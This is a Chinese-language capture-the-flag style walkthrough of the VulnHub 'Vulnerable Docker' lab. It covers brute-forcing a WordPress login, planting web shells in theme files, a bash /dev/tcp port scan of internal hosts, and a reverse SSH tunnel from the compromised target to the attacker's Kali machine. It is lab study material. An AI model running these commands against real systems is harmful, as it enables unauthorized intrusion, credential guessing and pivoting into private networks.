本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切后果與發表本文章的作者無關
靶機下載好加載到VMware里面去,我這里配置的網卡模式是僅主機模式,然后不知道是什么IP地址,我就使用Windows環境下的MAC地址掃描器掃描了一下發現了真是的IP地址,這里也是可以使用kali下netdiscover進行發現,當然也可以直接使用nmap進行全網段掃描,nmap -sn -v 192.168.5.*
地址:https://www.vulnhub.com/entry/vulnerable-docker-1,208/
發現目標靶機IP地址
全端口掃描目標開放的端口
發現開放8000端口看版本信息是WordPress,逐嘗試使用wpscan掃描看看有沒有漏洞
根據上述結果,可獲知目標靶機的管理員后台地址http://192.168.5.134:8000/wp-admin/ 和用戶名為bob等信息,沒有發現其他可利用的漏洞,嘗試進行暴力破解,針對WordPress的暴力破解有一個專門的工具https://github.com/n00py/WPForce
下載下來直接使用Python2.7即可執行,具體如下:
git clone https://github.com/n00py/WPForce
新建一個文件bmfx.txt里面添加用戶名bob,然后下載字典
curl -O -fsSL https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/xato-net-10-m
illion-passwords-10000.txt
字典包:https://github.com/danielmiessler/SecLists
一把梭,開始破解bob賬戶的密碼
獲得目標靶機的web應用用戶名:bob密碼:Welcome1
因為是web應用,所以這里也是可以使用burpsuite進行暴力破解
成功獲得了賬戶名和密碼之后開始登陸目標web
費了一些時間,最后通過編輯主題的方法成功拿到shell,這里推薦一篇關於WordPress拿shell的方法:https://cloud.tencent.com/developer/news/378799
拿到shell如下:
連接的客戶端是中國蟻劍,地址:https://doc.u0u.us/zh-hans/getting_started/get_antsword.html
這里也使用了webshell,https://github.com/p0rietea/p0wny-shell
對應shell地址:
http://192.168.5.134:8000/wp-content/themes/twentyseventeen/inc/back-compat.php
http://192.168.5.134:8000/wp-content/themes/twentyseventeen/inc/color-patterns.php
使用腳本探測存活的4個主機開放的端口
#!/bin/bash hosts=( "172.18.0.1" "172.18.0.2" "172.18.0.3" "172.18.0.4" ) END=65535 for host in "${hosts[@]}" do echo "========================================" echo "Scanning $host" echo "========================================" for ((port = 1; port <= END; port++)) do echo "" > /dev/tcp/$host/$port && echo "port $port is open" done 2>/dev/null done
發現172.18.0.3 上有8022端口,使用curl -s 172.18.0.3:8022查看發現如下信息:
那么這個時候需要做端口轉發打通隧道進行通信,下載openssh.deb文件,利用這個文件的里面的ssh和ssh-keygen命令生成秘鑰跟kali打通隧道,然后通過web瀏覽器訪問,下載地址:http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb
這里發現一個小坑,這個軟件包下載到目標靶機上不能正常執行dpkg -x openssh.deb 這個作用是解壓這包然后利用里面的命令工具,於是嘗試使用本地解壓然后打包成tar.gz的格式再重新下載到目標靶機上。
解壓之后執行如下命令:
cd usr/bin
chmod +x ssh*
./ssh-keygen -P '' -f id_rsa -t rsa
cat id_rsa.pub
將生成的公鑰復制到本地的kali下面
此時都准備好了,那么就可以在目標靶機上執行打通隧道的命令
./ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownhostsFile=/dev/null -v -i id_rsa -R 8022:172.18.0.3:8022 -fN kali@192.168.5.129
在kali環境下訪問8022端口
后面就是利用remote API未授權訪問的漏洞了,漏洞相關信息:https://www.secpulse.com/archives/55928.html
這里的靶機需要聯網裝docker環境,我這里配置的是僅主機模式不能訪問公網,所以后面的我就演示操作了
安裝的docker命令如下:
curl -fsSL get.docker.com -o get-docker.sh
sh get-docker.sh
docker ps
參考:https://gist.github.com/ejholmes/d4a046ba376f5d277b8a981b4a7db03e
